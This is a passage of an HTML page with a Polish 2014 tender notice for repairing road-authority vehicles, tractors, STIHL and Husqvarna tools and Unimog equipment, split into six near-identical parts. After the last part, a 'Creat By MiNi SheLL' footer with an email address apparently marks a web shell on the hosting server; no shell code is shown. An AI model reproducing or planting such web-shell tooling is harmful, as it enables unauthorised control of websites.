          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
Część zamówienia nr 2 - dotyczy  naprawy środków transportowych garażujących w Szubinie
Zakres usługi:                       (szacunkowa ilość r-godz. 190) 
-	naprawy samochodu osobowego marki SKODA FABIA;
-	naprawy samochodu marki Lublin nr 2.
-	przyczepka VIOLA o masie całkowitej do 750 kg nr 2;
-	naprawa rębaka nr 2
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
 Część zamówienia nr 3 -  dotyczy  naprawy środków transportowych garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 300)
-	naprawa ciągnika rolniczego FARMTRAC
-	naprawa przyczepy ciągnikowej;
-	naprawy kosiarki, agregatu, rębaka nr 1;
-	podnośnik TUR-2;
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
 Część zamówienia nr 4 - dotyczy  naprawy i konserwacji sprzętu STIHL i HUSQVARNA  garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 150)
-	naprawa wykaszarki STIHL nr1 i wykaszarki STIHL nr2;
-	naprawa wykaszarki STIHL  FS450 nr 1 i wykaszarki STIHL  FS450 nr 2;
-	naprawa podkrzesywarki STIHL131 nr1 i podkrzesywarki STIHL131 nr 2;
-	naprawa pilarki  STIHL nr1 i pilarki  STIHL nr 2;
-	naprawa przecinarki do betonu STIHL
-	naprawa wiertnicy glebowej STIHL
-	naprawa kosiarki spalinowej HUSQVARNA
-	naprawa pilarki spalinowej HUSQVARNA 345
-	naprawa pilarki spalinowej HUSQVARNA 365 nr 1 i pilarki spalinowej HUSQVARNA 365 nr2;
-	naprawa zagęszczarki HUSQVARNA nr1 i zagęszczarki HUSQVARNA nr 2;
-	naprawa zamiatarki STIHL nr 1;
-	naprawa pługa wirnikowego STIHL nr 2;
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
 Część zamówienia nr 5 - dotyczy naprawy i konserwacji osprzętu specjalistycznego do 
UNIMOGA garażujących w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 100)
      -  naprawa głowicy do koszenia trawy 
      -  naprawa głowicy do cięcia krzewów
      -  naprawa wiertnicy glebowej 
      -  naprawa myjki do znaków
      -  naprawa wysięgnika (ramie robocze)
      -  naprawa odmularki
      -  naprawa pługa wirnikowego
      -  naprawa pługa lekkiego
      -  naprawa solarki 
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu  oraz dostawa części zamiennych w 2014r. z podziałem na 6 części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje następujące usługi:
 Część zamówienia nr 6 - dotyczy naprawy i konserwacji pojazdu specjalistycznego typu Mercedes - Benz UNIMOG garażujący w siedzibie RDW w Tucholi  
Zakres usługi:                      (szacunkowa ilość r-godz. 300)
2.	Usługa obejmuje wykonanie prac (robociznę) oraz dostawę  i montaż nowych 
            potrzebnych materiałów eksploatacyjnych, akcesoriów gumowych oraz części 
            zamiennych pojazdów lub sprzętu. 

3.	Wykonawca winien mieć możliwość samodzielnego wykonania kompleksowej obsługi pojazdów i sprzętu z zakresu:
-	   napraw mechaniki, elektromechaniki, takich jak: naprawa zawieszenia, naprawa układu kierowniczego, naprawa układu napędowego, itp.
-	   konserwacji pojazdów i sprzętu,
-	   przeglądów technicznych OT-2,
-	posiadać zaplecze techniczne, kadrę pracowniczą  i praktykę do przeprowadzenia wymienionego zakresu napraw pojazdów i podzespołów,
4.    Wykonawca zobowiązany jest po otrzymaniu od osoby odpowiedzialnej za realizację umowy ze strony Zamawiającego polecenia wykonania naprawy do: 
odebrania pojazdu lub sprzętu z miejsca wskazanego przez Zamawiającego                       i przetransportowania go do miejsca wykonania naprawy na własny koszt i ryzyko, a po naprawie do odstawienia pojazdu lub sprzętu do wskazanego w pkt. 2 miejsca garażowania. Cena ewentualnego transportu pojazdu winna być wkalkulowana w cenę jednostkową roboczogodziny.

5.     Wykonawca wykona bieżące naprawy w terminie nie dłuższym niż do 3 dni 
        roboczych, a termin usunięcia awarii zostanie każdorazowo uzgodniony między 
        stronami.

6.  	Wykonawca odpowiedzialny jest za jakość oraz zgodność z ustaleniami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.

7.      Wykonawca udzieli na wykonane usługi naprawcze 6 miesięcznej gwarancji    
          liczonej od dnia wystawienia faktury oraz na użyte części do  napraw wykonanych  
         w ramach gwarancji - gwarancji na okres zgodny z  udzieloną gwarancją   
         producenta.

8. 	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowioną osobą odpowiedzialną za realizację umowy ze strony wykonawcy.

9.    W przypadkach, gdy podczas wykonywania przeglądu lub naprawy, wystąpi oprócz             
          przewidzianych operacji konieczność dodatkowych wymian lub naprawy, mogą 
         one być wykonane tylko za zgodą Zamawiającego.

10.      Zamawiający dopuszcza możliwość zwiększenia ilości obsługiwanych pojazdów               
          i sprzętu w trakcie trwania umowy.

11.	Na zastosowane części i materiały Wykonawca udzieli Zamawiającemu stałego rabatu obowiązującego w niezmienionej wysokości przez cały okres realizacji zamówienia. 
 
12.   Wykonawca zobowiązany będzie do utylizacji zużytych części zamiennych, akcesoriów i materiałów eksploatacyjnych wymienionych podczas napraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.00.00-9, 34.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com